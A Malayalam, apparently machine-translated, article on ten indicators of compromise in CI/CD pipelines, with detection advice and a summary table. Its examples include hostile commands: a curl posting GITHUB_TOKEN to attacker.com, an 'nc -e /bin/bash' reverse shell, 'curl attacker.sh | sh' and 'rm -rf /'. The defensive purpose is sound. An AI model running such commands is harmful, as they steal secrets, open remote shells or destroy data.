ആമുഖം: സൈബർ സുരക്ഷയിലെ വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ എന്തൊക്കെയാണ്?
വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങളാണ് നിങ്ങളുടെ സിസ്റ്റം അല്ലെങ്കിൽ pipeline ആക്രമണത്തിന് വിധേയമായേക്കാം. ലളിതമായി പറഞ്ഞാൽ, വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ ആക്രമണകാരികൾ അവശേഷിപ്പിച്ച അടയാളങ്ങൾ വിചിത്രമാണോ? logins, ഫയൽ മാറ്റങ്ങൾ, അല്ലെങ്കിൽ മറഞ്ഞിരിക്കുന്ന മാൽവെയർ. ഇൻ ഐഒസി സൈബർ സുരക്ഷ, അവ ഒരു കുറ്റകൃത്യം നടന്ന സ്ഥലത്ത് വിരലടയാളങ്ങൾ പോലെ പ്രവർത്തിക്കുന്നു, എന്തോ കുഴപ്പമുണ്ടെന്ന് വ്യക്തമായ തെളിവ് നൽകുന്നു. അതിനാൽ, ഡെവലപ്പർമാർ ചോദിക്കുമ്പോൾ വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ എന്തൊക്കെയാണ്, ഉത്തരം സെർവറുകളിലോ ഫയർവാളുകളിലോ മാത്രമായി പരിമിതപ്പെടുത്തിയിട്ടില്ല, ആധുനികതയിൽ മറഞ്ഞിരിക്കുന്ന അപകടസാധ്യതകളും ഇതിൽ ഉൾപ്പെടുന്നു CI/CD pipelines.
ഇവയിൽ pipelineആക്രമണകാരികൾക്ക് കോഡിൽ കൃത്രിമം കാണിക്കാനോ, ക്ഷുദ്രകരമായ ആശ്രിതത്വങ്ങൾ കുത്തിവയ്ക്കാനോ, ബിൽഡ് ഘട്ടങ്ങൾ മാറ്റാനോ കഴിയും, പക്ഷേ മിക്ക ഗൈഡുകളും ഇപ്പോഴും സെർവറുകളിലോ നെറ്റ്വർക്കുകളിലോ മാത്രമാണ് ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നത്. തൽഫലമായി, സോഫ്റ്റ്വെയർ വിതരണ ശൃംഖല ഏറ്റവും എളുപ്പമുള്ള ലക്ഷ്യങ്ങളിലൊന്നായി മാറിയിരിക്കുന്നു.
അതുകൊണ്ടാണ് വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ കണ്ടെത്തുന്നത് CI/CD pipelines അത്യാവശ്യമാണ്. എല്ലാറ്റിനുമുപരി, മാൽവെയറുകൾ തടയാനും, രഹസ്യങ്ങൾ സംരക്ഷിക്കാനും, സോഫ്റ്റ്വെയർ ഡെലിവറിയുടെ ഓരോ ഘട്ടവും സുരക്ഷിതമാക്കാനും ഇത് ടീമുകളെ സഹായിക്കുന്നു.
വിട്ടുവീഴ്ചയുടെ മികച്ച 10 സൂചകങ്ങൾ CI/CD Pipelines
വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ വിശദീകരിക്കുമ്പോൾ, മിക്ക ലിസ്റ്റുകളും സെർവറുകളിലോ നെറ്റ്വർക്കുകളിലോ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നു. എന്നിട്ടും CI/CD pipelineആക്രമണകാരികൾ വളരെ വ്യത്യസ്തമായ വിരലടയാളങ്ങൾ അവശേഷിപ്പിക്കുന്നു. മുൻകരുതൽ പ്രതിരോധത്തിന് ഈ സിഗ്നലുകൾ തിരിച്ചറിയുന്നത് നിർണായകമാണ്. ഓരോ ഡെവലപ്പറും സുരക്ഷാ എഞ്ചിനീയറും ശ്രദ്ധിക്കേണ്ട 10 IOC സൈബർ സുരക്ഷാ സൂചനകൾ ചുവടെയുണ്ട്.
1. സംശയാസ്പദമായ ആശ്രിതത്വ മാറ്റങ്ങൾ
വിട്ടുവീഴ്ചയുടെ പ്രധാന സൂചകങ്ങളിലൊന്ന് pipelines എന്നത് പെട്ടെന്നുള്ളതും വിചിത്രവുമായ ഒരു ആശ്രിതത്വ അപ്ഡേറ്റാണ്. അപകടകരമായ പാക്കേജുകൾ ചേർക്കാൻ ആക്രമണകാരികൾ പലപ്പോഴും പാക്കേജ് മാനേജർമാരിൽ ഡെവലപ്പർമാരുടെ വിശ്വാസ്യത ഉപയോഗിക്കുന്നു.
ഉദാഹരണത്തിന്, npm a-ൽ package.json വ്യത്യാസം പെട്ടെന്ന് ഉൾപ്പെട്ടേക്കാം:
+ "crypto-helper": "^1.0.2" അത്തരം മാറ്റങ്ങൾ സുരക്ഷിതമാണെന്ന് തോന്നുമെങ്കിലും ഓരോ ബിൽഡിലേക്കും ട്രോജനൈസ്ഡ് കോഡ് കുത്തിവയ്ക്കാൻ അവയ്ക്ക് കഴിയും.
സ്വാധീനം: അപകടത്തിൽപ്പെട്ട ബിൽഡുകൾക്ക് ഉറവിടത്തിൽ തന്നെ മാൽവെയർ അവകാശപ്പെടും.
കണ്ടെത്തൽ: ഡിപൻഡൻസി അവലോകനങ്ങൾ നടപ്പിലാക്കുക, ലോക്ക്ഫയൽ വ്യത്യാസങ്ങൾ ട്രാക്ക് ചെയ്യുക, പുതിയ പാക്കേജുകൾ എല്ലായ്പ്പോഴും സ്കാൻ ചെയ്യുക.
2. ബിൽഡുകളിലെ അവ്യക്തമായ കോഡ്
അവലോകനങ്ങളെ മറികടക്കാൻ മാൽവെയർ രചയിതാക്കൾ അവ്യക്തതയെ ആശ്രയിക്കുന്നു. തൽഫലമായി, വിട്ടുവീഴ്ചയുടെ ഈ സൂചകം CI/CD pipelineപിടികൂടാൻ ഏറ്റവും ബുദ്ധിമുട്ടുള്ള ഒന്നായിരിക്കാം s. വാസ്തവത്തിൽ, അവ്യക്തമായ പേലോഡുകൾ പലപ്പോഴും മുന്നറിയിപ്പില്ലാതെ ഓപ്പൺ സോഴ്സ് ലൈബ്രറികളിലേക്കോ കണ്ടെയ്നർ ഇമേജുകളിലേക്കോ വഴുതിവീഴാറുണ്ട്.
ഉദാഹരണത്തിന്:
- ഒരു PyPI പാക്കേജ് ഉപയോഗിക്കുന്നത്
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - ആവശ്യമില്ലാത്ത UPX ബൈനറികൾ നിറഞ്ഞ ഒരു ഡോക്കർ ചിത്രം.
- ജാവാസ്ക്രിപ്റ്റ് നിറഞ്ഞത്
\x41\x42ക്രെഡൻഷ്യൽ മോഷ്ടാക്കളെ ഒളിപ്പിച്ച് രക്ഷപ്പെടുന്നു.
സ്വാധീനം: ബിൽഡ് അല്ലെങ്കിൽ റൺടൈം സമയത്ത് മറഞ്ഞിരിക്കുന്ന കോഡ് നിശബ്ദമായി പ്രവർത്തിക്കുന്നു, ഇത് IOC സൈബർ സുരക്ഷയിൽ ഒരു നിർണായക സൂചനയാക്കുന്നു.
കണ്ടെത്തൽ: സംയോജിപ്പിക്കുക SAST എൻകോഡ് ചെയ്തതോ പാക്ക് ചെയ്തതോ ആയ കോഡ് ഫ്ലാഗ് ചെയ്യുന്നതിന് മാൽവെയർ സ്കാൻ ചെയ്യുന്നതിലൂടെ. എല്ലാറ്റിനുമുപരി, കൂടുതൽ അന്വേഷണം അർഹിക്കുന്ന ഒരു ചുവന്ന പതാകയായി അവ്യക്തതയെ കണക്കാക്കുക.
3. ജിറ്റിൽ വെളിപ്പെടുത്തിയ രഹസ്യങ്ങൾ: ഒരു ക്ലാസിക് ഐഒസി സൈബർ സുരക്ഷാ അപകടസാധ്യത
CI/CD pipelineഉപയോക്താക്കൾ പലപ്പോഴും രഹസ്യങ്ങൾ നേരിട്ട് സംഭരണികളിൽ നിന്ന് അവകാശപ്പെടുന്നു. എന്നിരുന്നാലും, Git-ൽ രഹസ്യങ്ങൾ പ്രത്യക്ഷപ്പെടുമ്പോൾ, അവ "വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ എന്തൊക്കെയാണ്" എന്ന ചോദ്യത്തിനുള്ള ഏറ്റവും വ്യക്തമായ ഉത്തരങ്ങളിൽ ഒന്നായി മാറുന്നു pipeline"Git-ൽ ക്രെഡൻഷ്യലുകൾ എത്തിക്കഴിഞ്ഞാൽ, ആക്രമണകാരികൾക്ക് അവ അനിശ്ചിതമായി ചൂഷണം ചെയ്യാൻ കഴിയും.
ഉദാഹരണത്തിന്:
- A
.envഅടങ്ങുന്ന ഫയൽAWS_SECRET_KEY=. - ടോക്കണുകൾ നൽകി
config.json. - നീക്കം ചെയ്തതിനു ശേഷവും Git ചരിത്രത്തിൽ രഹസ്യങ്ങൾ ഇപ്പോഴും ദൃശ്യമാണ്.
സ്വാധീനം: തുറന്നുകിടക്കുന്ന കീകൾ ആക്രമണകാരികൾക്ക് നേരിട്ട് ആക്സസ് നൽകുന്നു CI/CD pipelineകൾ, ക്ലൗഡ് സിസ്റ്റങ്ങൾ അല്ലെങ്കിൽ ഡാറ്റാബേസുകൾ. അതിനാൽ ഇത് വിട്ടുവീഴ്ചയുടെ ഏറ്റവും അപകടകരമായ സൂചകങ്ങളിൽ ഒന്നാണ്.
കണ്ടെത്തൽ: ഉപയോഗം pre-commit hooks രഹസ്യ സ്കാനിംഗിനായി CI ജോലികൾ, ചോർന്ന കീകൾ ഉടനടി പിൻവലിക്കൽ. കൂടാതെ, എക്സ്പോഷർ വിൻഡോകൾ കുറയ്ക്കുന്നതിന് ഓട്ടോമേറ്റഡ് റെമഡിയേഷൻ നടപ്പിലാക്കുക.
4. കൃത്രിമം കാണിച്ചു Pipeline കോൺഫിഗറേഷനുകൾ: വിട്ടുവീഴ്ചയുടെ മറഞ്ഞിരിക്കുന്ന സൂചകങ്ങൾ
Pipeline കോൺഫിഗുകൾ ഉയർന്ന മൂല്യമുള്ള ലക്ഷ്യങ്ങളാണ് കാരണം ഒരൊറ്റ പരിഷ്ക്കരണം പലപ്പോഴും മുഴുവൻ വർക്ക്ഫ്ലോയെയും ഹൈജാക്ക് ചെയ്യുന്നു. തൽഫലമായി, കൃത്രിമമായി pipeline പരമ്പരാഗത നിരീക്ഷണ ഉപകരണങ്ങൾ അപൂർവ്വമായി കണ്ടെത്തുന്ന ഒരു പ്രധാന ഐഒസി സൈബർ സുരക്ഷാ അപകടസാധ്യതയാണ് ഫയലുകൾ.
ഉദാഹരണത്തിന്:
GitHub പ്രവർത്തനങ്ങളിൽ:
- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN- GitLab-ൽ: ഒരു ദോഷകരമായ ജോലി ചേർത്തു
.gitlab-ci.ymlഅത് സെൻസിറ്റീവ് ഡാറ്റ ഉപേക്ഷിക്കുന്നു. - ജെൻകിൻസിൽ:
sh "nc -e /bin/bash attacker.com 4444".
സ്വാധീനം: ഈ അംഗീകരിക്കാത്ത മാറ്റങ്ങൾ നിങ്ങളുടെ pipeline ആക്രമണകാരികൾക്ക് സ്ഥിരമായ ഒരു പിൻവാതിലിലേക്ക്, ഇത് വ്യക്തമായും വിട്ടുവീഴ്ചയുടെ സൂചകമായി കണക്കാക്കപ്പെടുന്നു.
കണ്ടെത്തൽ: ഒപ്പിട്ട കോൺഫിഗറേഷനുകൾ നടപ്പിലാക്കുക, പിആർ അംഗീകാരങ്ങൾ ആവശ്യപ്പെടുക, അപ്രതീക്ഷിത ജോലികൾ നിരീക്ഷിക്കുക. കൂടാതെ, സജ്ജമാക്കുക guardrails അത് മാറ്റം വരുത്തിയ വർക്ക്ഫ്ലോകളെ യാന്ത്രികമായി തടയുന്നു.
5. പ്രിവിലേജ്ഡ് IaC സ്ഥിരസ്ഥിതികൾ
തെറ്റായി ക്രമീകരിച്ച അടിസ്ഥാന സൗകര്യ നിർവചനങ്ങൾ പലപ്പോഴും മറഞ്ഞിരിക്കുന്ന പിൻവാതിലുകൾ സൃഷ്ടിക്കുന്നു. തൽഫലമായി, പ്രിവിലേജ്ഡ് ഡിഫോൾട്ടുകൾ IaC ഒരു ക്ലാസിക് IOC സൈബർ സുരക്ഷാ അപകടസാധ്യതയാണ്.
ഉദാഹരണത്തിന്:
- പോഡുകൾ അനുവദിക്കുന്ന കുബേർനെറ്റസ് വിന്യാസം
privileged: true. - ഹെൽം ചാർട്ടുകൾ എക്സ്പോസിംഗ് സേവനങ്ങൾ ഉപയോഗിച്ച്
0.0.0.0:22.
സ്വാധീനം: ആക്രമണകാരികൾക്ക് റൂട്ട്-ലെവൽ ആക്സസ് ലഭിക്കുകയോ ആന്തരിക സേവനങ്ങൾ പൊതുജനങ്ങൾക്ക് മുന്നിൽ തുറന്നുകാട്ടുകയോ ചെയ്യുന്നു. തൽഫലമായി, ഈ പ്രശ്നങ്ങൾ ആക്രമണ പ്രതലത്തെ ഗണ്യമായി വികസിപ്പിക്കുന്നു.
കണ്ടെത്തൽ: പ്രയോഗിക്കുക IaC ലയിപ്പിക്കുന്നതിന് മുമ്പ് ഏറ്റവും കുറഞ്ഞ പ്രിവിലേജ് നടപ്പിലാക്കാൻ സ്കാൻ ചെയ്യുന്നു. കൂടാതെ, എല്ലാ കോൺഫിഗറേഷനും അതിന്റെ ഭാഗമായി അവലോകനം ചെയ്തിട്ടുണ്ടെന്ന് ഉറപ്പാക്കുക. pipeline.
6. അസാധാരണമായ ശരീര സ്വഭാവങ്ങൾ
ആക്രമണകാരികൾ പലപ്പോഴും മാറുന്നു pipeline മറ്റൊരു വിധത്തിൽ പറഞ്ഞാൽ, അസാധാരണമായ ബിൽഡ് ആക്റ്റിവിറ്റി എന്നത് വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ എന്താണെന്നതിനുള്ള ഏറ്റവും വ്യക്തമായ ഉത്തരങ്ങളിൽ ഒന്നാണ്. CI/CD pipelines.
ഉദാഹരണത്തിന്:
- വിചിത്രമായ ഡൊമെയ്നുകളിലേക്ക് ഔട്ട്ബൗണ്ട് നെറ്റ്വർക്ക് അഭ്യർത്ഥനകൾ നടത്തുന്ന ബിൽഡുകൾ.
- ഒരു Node.js പ്രോജക്റ്റ് പെട്ടെന്ന് പവർഷെൽ ആരംഭിക്കുമ്പോൾ
npm install. - ബിൽഡ് സ്ക്രിപ്റ്റുകളിൽ നിർവചിച്ചിട്ടില്ലാത്ത വലിയ ബൈനറികൾ ഡൗൺലോഡ് ചെയ്യുന്ന ഒരു CI ജോലി.
സ്വാധീനം: കോംപ്രമൈസ് ചെയ്ത ബിൽഡുകൾക്ക് മാൽവെയർ വിതരണ പോയിന്റുകളായി പ്രവർത്തിക്കാൻ കഴിയും. എല്ലാറ്റിനുമുപരി, അവ ഓരോ വിന്യാസത്തിലും ദോഷകരമായ പേലോഡുകൾ വ്യാപിപ്പിക്കുന്നു.
കണ്ടെത്തൽ: അപ്രതീക്ഷിത പ്രക്രിയകൾക്കോ കണക്ഷനുകൾക്കോ വേണ്ടി ബിൽഡ് ലോഗുകൾ നിരീക്ഷിക്കുക. കൂടാതെ, മാനദണ്ഡത്തിന് പുറത്തുള്ള പെരുമാറ്റങ്ങൾ ഫ്ലാഗ് ചെയ്യുന്നതിന് അനോമലി ഡിറ്റക്ഷൻ കോൺഫിഗർ ചെയ്യുക.
7. ഐഒസി സൈബർ സുരക്ഷാ അപകടസാധ്യതകളായി ക്ഷുദ്ര പാക്കേജ് സ്ക്രിപ്റ്റുകൾ
പാക്കേജ് മാനേജർമാർ ജീവിതചക്രത്തെ പിന്തുണയ്ക്കുന്നു hooks ആക്രമണകാരികൾ ചൂഷണം ചെയ്യുന്നവയാണ്. അതിനാൽ, npm, PyPI, അല്ലെങ്കിൽ Dockerfiles എന്നിവയിലെ ക്ഷുദ്ര സ്ക്രിപ്റ്റുകൾ വിട്ടുവീഴ്ചയുടെ ശക്തമായ സൂചകങ്ങളാണ്.
ഉദാഹരണത്തിന്:
- എൻപിഎം:
postinstallസ്ക്രിപ്റ്റ് പ്രവർത്തിക്കുന്നുrm -rf /അല്ലെങ്കിൽ ഒരു C2 ലേക്ക് ബീക്കണിംഗ് ചെയ്യുന്നു. - പിപിഐ:
setup.pyഇൻസ്റ്റാളിൽ മറഞ്ഞിരിക്കുന്ന പൈത്തൺ കോഡ് എക്സിക്യൂട്ട് ചെയ്യുന്നു. - ഡോക്കർഫയൽ:
RUN curl attacker.sh | sh.
സ്വാധീനം: റൺടൈം പരിശോധനയ്ക്ക് മുമ്പ്, ഇൻസ്റ്റാളേഷൻ സമയത്താണ് ആക്രമണം നടക്കുന്നത്. തൽഫലമായി, വളരെ വൈകുന്നതുവരെ ഡെവലപ്പർമാർ അത് ഒരിക്കലും ശ്രദ്ധിച്ചേക്കില്ല.
കണ്ടെത്തൽ: ഇൻസ്റ്റാൾ സ്ക്രിപ്റ്റുകൾക്കായി സ്കാൻ പാക്കേജ് മാനിഫെസ്റ്റുകൾ. കൂടാതെ, അപകടസാധ്യതയുള്ളവ നിയന്ത്രിക്കുക hooks in CI/CD എക്സ്പോഷർ കുറയ്ക്കുന്നതിനുള്ള ജോലികൾ.
8. രജിസ്ട്രി വിഷബാധ സൂചകങ്ങൾ കോംപ്രമൈസ്
ആക്രമണകാരികൾ രജിസ്ട്രികളിലെ പുരാവസ്തുക്കൾ മാറ്റിസ്ഥാപിക്കുകയോ പരിഷ്കരിക്കുകയോ ചെയ്യുന്നു, ഈ സംഭവങ്ങൾ വിതരണ ശൃംഖലയിലെ വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ എന്താണെന്നതിന്റെ പാഠപുസ്തക ഉദാഹരണങ്ങളാണ്. pipelines.
ഉദാഹരണത്തിന്:
- ട്രോജനൈസ്ഡ് ലെയർ ഉപയോഗിച്ച് നിശബ്ദമായി അപ്ഡേറ്റ് ചെയ്ത ഒരു ഡോക്കർ ഇമേജ് ടാഗ്.
- വിഷം കലർന്ന ഒരു പതിപ്പ് ഉപയോഗിച്ച് ഒരു ആന്തരിക പാക്കേജ് മാറ്റി.
- npm നെയിംസ്പെയ്സ് സ്ക്വാട്ടിംഗ്, ഉദാഹരണത്തിന്
lodash-proxy.
സ്വാധീനം: രജിസ്ട്രി ആർട്ടിഫാക്റ്റ് ഉപയോഗിക്കുന്ന എല്ലാ ബിൽഡും വിട്ടുവീഴ്ച ചെയ്യപ്പെടുന്നു. മാത്രമല്ല, ഈ വിട്ടുവീഴ്ച ഡൗൺസ്ട്രീം സേവനങ്ങളിലേക്കും വ്യാപിക്കുന്നു.
കണ്ടെത്തൽ: എല്ലാ രജിസ്ട്രി പുൾകളിലും ഒപ്പ്, സമഗ്രത പരിശോധനകൾ നടപ്പിലാക്കുക. കൂടാതെ, ആർട്ടിഫാക്റ്റ് ഉത്ഭവം ട്രാക്ക് ചെയ്യുക SBOM മൂല്യനിർണ്ണയം.
9. IOC തെളിവായി അസാധാരണമായ ഉപയോക്തൃ പ്രവർത്തനം
വിട്ടുവീഴ്ച ചെയ്യപ്പെട്ട അക്കൗണ്ടുകൾ മിക്കവാറും എല്ലായ്പ്പോഴും അസാധാരണമായ അടയാളങ്ങൾ അവശേഷിപ്പിക്കും. അതനുസരിച്ച്, അസാധാരണമായ ഡെവലപ്പർ പെരുമാറ്റം വിട്ടുവീഴ്ചയുടെ ശക്തമായ സൂചകമാണ്.
ഉദാഹരണത്തിന്:
- Commitപ്രാദേശിക സമയം പുലർച്ചെ 3 മണിക്ക്.
- അവധിക്കാലത്ത് അക്കൗണ്ടുകളുടെ പിആർ അംഗീകാരങ്ങൾ.
- Pipelineഅസാധാരണമായ ആവൃത്തിയിൽ ട്രിഗർ ചെയ്തു.
സ്വാധീനം: ആക്രമണകാരികൾ ദോഷകരമായ മാറ്റങ്ങൾ വരുത്തുന്നതിനായി മോഷ്ടിച്ച ക്രെഡൻഷ്യലുകൾ ദുരുപയോഗം ചെയ്യുന്നു. എല്ലാത്തിനുമുപരി, അനധികൃതം commitസാധാരണ വർക്ക്ഫ്ലോകളിലേക്ക് എളുപ്പത്തിൽ ലയിക്കുന്നു.
കണ്ടെത്തൽ: നിരന്തരം നിരീക്ഷിക്കുക SCM അപാകതകൾക്കുള്ള പ്രവർത്തനം, MFA നടപ്പിലാക്കുക, ടോക്കണുകൾ പതിവായി തിരിക്കുക. കൂടാതെ, സംശയാസ്പദമായ കാര്യങ്ങളിൽ മുന്നറിയിപ്പ് നൽകുക commit അല്ലെങ്കിൽ അംഗീകാര പാറ്റേണുകൾ.
10. ഐഒസി സൈബർ സുരക്ഷയിൽ പരാജയപ്പെട്ട ഇന്റഗ്രിറ്റി അല്ലെങ്കിൽ സിഗ്നേച്ചർ പരിശോധനകൾ
പൊതുവായതും എന്നാൽ അവഗണിക്കപ്പെട്ടതുമായ ഒന്ന് വിട്ടുവീഴ്ചയുടെ സൂചകം പരാജയപ്പെട്ട സമഗ്രത അല്ലെങ്കിൽ ഒപ്പ് പരിശോധനയാണ്. IOC സൈബർ സുരക്ഷയിൽ, കോഡോ ആർട്ടിഫാക്റ്റുകളോ ആധികാരികമാണെന്ന് ഈ പരിശോധനകൾ സ്ഥിരീകരിക്കുന്നു. അവ ഒഴിവാക്കുന്നത് ഒഴിവാക്കുന്നു pipelineതുറന്നുകാട്ടപ്പെട്ടു.
ഉദാഹരണങ്ങൾ:
- പ്രതീക്ഷിച്ച ചെക്ക്സവുമായി പൊരുത്തപ്പെടാത്ത ഒരു SHA256 ഹാഷ്.
- നഷ്ടപ്പെട്ടതോ അസാധുവായതോ ആയ ഒരു GPG ഒപ്പ്.
- An SBOM ഒപ്പിടാത്ത പുരാവസ്തുക്കൾ കാണിക്കുന്നു.
സ്വാധീനം: സമഗ്രത പരാജയങ്ങൾ പലപ്പോഴും കൃത്രിമത്വം, രജിസ്ട്രി വിഷബാധ, അല്ലെങ്കിൽ മാൽവെയർ കുത്തിവയ്പ്പ് എന്നിവയെ സൂചിപ്പിക്കുന്നു.
കണ്ടെത്തൽ: ഒപ്പ് പരിശോധനകൾ ഓട്ടോമേറ്റ് ചെയ്യുക, ചെക്ക്സം വാലിഡേഷൻ നടപ്പിലാക്കുക, ഒപ്പിടാത്ത ഘടകങ്ങൾ തടയുക. എല്ലാറ്റിനുമുപരി, പരാജയപ്പെട്ട ഓരോ പരിശോധനയെയും വിട്ടുവീഴ്ചയുടെ വ്യക്തമായ തെളിവായി കണക്കാക്കുക.
CI/CD വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ ഒറ്റനോട്ടത്തിൽ
| വിട്ടുവീഴ്ചയുടെ സൂചകം (IOC) | ആഘാതം CI/CD Pipelines | എങ്ങനെ കണ്ടുപിടിക്കാം |
|---|---|---|
| സംശയാസ്പദമായ ആശ്രിതത്വ മാറ്റങ്ങൾ | ആക്രമണകാരികൾ പാക്കേജ് മാനേജർമാരിൽ ക്ഷുദ്ര ലൈബ്രറികൾ കുത്തിവയ്ക്കുന്നു, ഇത് ബിൽഡുകൾക്ക് കേടുപാടുകൾ വരുത്തുന്നതിലേക്ക് നയിക്കുന്നു. | ലോക്ക്ഫയൽ വ്യത്യാസങ്ങൾ ട്രാക്ക് ചെയ്യുക, ആശ്രിതത്വ അവലോകനങ്ങൾ നടപ്പിലാക്കുക, ആശ്രിതത്വങ്ങൾ തുടർച്ചയായി സ്കാൻ ചെയ്യുക. |
| ബിൽഡുകളിലെ അവ്യക്തമായ കോഡ് | മറഞ്ഞിരിക്കുന്ന പേലോഡുകൾ ബിൽഡുകളിലോ റൺടൈമിലോ കണ്ടെത്തൽ കൂടാതെ പ്രവർത്തിക്കുന്നു. | ഉപയോഗം SAST കൂടാതെ ബേസ്64, ഹെക്സ് അല്ലെങ്കിൽ പാക്ക് ചെയ്ത കോഡ് പാറ്റേണുകൾ ഫ്ലാഗ് ചെയ്യുന്നതിനായി മാൽവെയർ സ്കാനിംഗ്. |
| Git-ൽ വെളിപ്പെടുത്തിയ രഹസ്യങ്ങൾ | ചോർന്ന ടോക്കണുകളോ API കീകളോ ആക്രമണകാരികൾക്ക് നിർണായക സിസ്റ്റങ്ങളിലേക്ക് നേരിട്ട് പ്രവേശനം നൽകുന്നു. | Git-ൽ രഹസ്യ സ്കാനുകൾ പ്രവർത്തിപ്പിക്കുക hooks ചോർന്ന ക്രെഡൻഷ്യലുകൾ സ്വയമേവ പിൻവലിക്കുകയും ചെയ്യുക. |
| കൃത്രിമം കാണിച്ചു Pipeline കോൺഫിഗറേഷൻ | പരിഷ്കരിച്ച വർക്ക്ഫ്ലോകൾ ഡാറ്റ പുറന്തള്ളൽ അല്ലെങ്കിൽ ഉള്ളിൽ നിലനിൽക്കാൻ അനുവദിക്കുന്നു. CI/CD. | പിആർ അംഗീകാരങ്ങൾ ആവശ്യപ്പെടുക, ഒപ്പിട്ട കോൺഫിഗറേഷനുകൾ നടപ്പിലാക്കുക, നിരീക്ഷിക്കുക pipeline മാറ്റങ്ങൾ. |
| പ്രിവിലേജ്ഡ് IaC സ്ഥിരസ്ഥിതികൾ | അമിതമായി അനുവദനീയമായ റോളുകളോ സുരക്ഷിതമല്ലാത്ത ഡിഫോൾട്ടുകളോ ക്ലൗഡ് പരിതസ്ഥിതികളെ തുറന്നുകാട്ടുന്നു. | ഏറ്റവും കുറഞ്ഞ പ്രിവിലേജ് എൻഫോഴ്സ്മെന്റിനായി ടെറാഫോം, കുബേർനെറ്റസ്, ഹെൽം ഫയലുകൾ സ്കാൻ ചെയ്യുക. |
| അസാധാരണമായ ബിൽഡ് പെരുമാറ്റങ്ങൾ | Pipelineമാൽവെയർ വിതരണ പോയിന്റുകളായോ ലാറ്ററൽ മൂവ്മെന്റിനോ ഉപയോഗിക്കുന്നു. | അപ്രതീക്ഷിത ഡൗൺലോഡുകൾ, പ്രോസസ്സുകൾ അല്ലെങ്കിൽ ഔട്ട്ബൗണ്ട് കോളുകൾ എന്നിവയ്ക്കായി ബിൽഡ് ലോഗുകൾ വിശകലനം ചെയ്യുക. |
| ക്ഷുദ്ര പാക്കേജ് സ്ക്രിപ്റ്റുകൾ | റൺടൈം പരിശോധനയ്ക്ക് മുമ്പ് മറഞ്ഞിരിക്കുന്ന പ്രീ/പോസ്റ്റ്-ഇൻസ്റ്റാൾ സ്ക്രിപ്റ്റുകൾ പേലോഡുകൾ ട്രിഗർ ചെയ്യുന്നു. | അപകടകരമായ npm/PyPI സ്ക്രിപ്റ്റുകൾ തടയുകയും നിർവ്വഹണം നിയന്ത്രിക്കുകയും ചെയ്യുക CI/CD ജോലികൾ. |
| രജിസ്ട്രി വിഷബാധ | ട്രോജനൈസ് ചെയ്ത ആർട്ടിഫാക്റ്റുകൾ രജിസ്ട്രികളിലെ വിശ്വസനീയമായ ചിത്രങ്ങളോ ബൈനറികളോ മാറ്റിസ്ഥാപിക്കുന്നു. | ചെക്ക്സം പരിശോധിക്കുക, ഒപ്പ് സാധൂകരണം നടപ്പിലാക്കുക, രജിസ്ട്രികൾ മുൻകൂട്ടി സ്കാൻ ചെയ്യുക. |
| അസാധാരണമായ ഉപയോക്തൃ പ്രവർത്തനം | അപഹരിക്കപ്പെട്ട അക്കൗണ്ടുകൾ ദോഷകരമായ കാര്യങ്ങൾ പ്രചരിപ്പിക്കുന്നു commits അല്ലെങ്കിൽ ട്രിഗർ pipelines. | എംഎഫ്എ നടപ്പിലാക്കുക, നിരീക്ഷിക്കുക commitഅപാകതകൾക്ക് s, വിശകലനം ചെയ്യുക login പാറ്റേണുകൾ. |
| പരാജയപ്പെട്ട സമഗ്രത അല്ലെങ്കിൽ ഒപ്പ് പരിശോധനകൾ | തകരാറുള്ള കോഡ്, ഡിപൻഡൻസികൾ അല്ലെങ്കിൽ ഇമേജുകൾ എന്നിവയിലേക്ക് പ്രവേശിക്കുന്നത് സൂചിപ്പിക്കുന്നു pipeline. | സമഗ്രത പരിശോധനകൾ ഓട്ടോമേറ്റ് ചെയ്യുക, ഒപ്പിടാത്തതോ പൊരുത്തപ്പെടാത്തതോ ആയ ഘടകങ്ങൾ തടയുക. |
പരമ്പരാഗത ഐഒസി സൈബർ സുരക്ഷ എന്തുകൊണ്ട് നഷ്ടപ്പെടുത്തുന്നു CI/CD അപകടവും
സെർവറുകൾ, കമ്പ്യൂട്ടറുകൾ അല്ലെങ്കിൽ നെറ്റ്വർക്കുകൾ എന്നിവയിലെ വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ മിക്ക സ്ഥാപനങ്ങളും ഇതിനകം നിരീക്ഷിച്ചുകൊണ്ടിരിക്കുകയാണ്. എന്നിരുന്നാലും, ഐഒസി സൈബർ സുരക്ഷയോടുള്ള ഈ ക്ലാസിക് സമീപനം അവഗണിക്കുന്നു CI/CD pipelineഇപ്പോൾ ഏറ്റവും നിർണായകമായ ആക്രമണ പ്രതലങ്ങളിൽ ഒന്നായ s. വാസ്തവത്തിൽ, pipelineപരമ്പരാഗത ഉപകരണങ്ങൾക്ക് കണ്ടെത്താൻ കഴിയാത്ത അതുല്യമായ വിട്ടുവീഴ്ച സിഗ്നലുകൾ കൾ കാണിക്കുന്നു.
പരമ്പരാഗത സുരക്ഷയിലെ വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ
പരമ്പരാഗത ഐഒസി സൈബർ സുരക്ഷയിൽ, സാധാരണയായി ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നത്:
- അസാധാരണമായ loginമോഷ്ടിച്ച ക്രെഡൻഷ്യലുകൾ നിർദ്ദേശിക്കുന്ന s അല്ലെങ്കിൽ IP വിലാസങ്ങൾ.
- മാൽവെയർ വെളിപ്പെടുത്തുന്ന സംശയാസ്പദമായ ഫയൽ ഹാഷുകൾ അല്ലെങ്കിൽ രജിസ്ട്രി മാറ്റങ്ങൾ.
- ഡാറ്റ ചോർച്ചയിലേക്ക് വിരൽ ചൂണ്ടുന്ന അപ്രതീക്ഷിത ഔട്ട്ബൗണ്ട് ട്രാഫിക്.
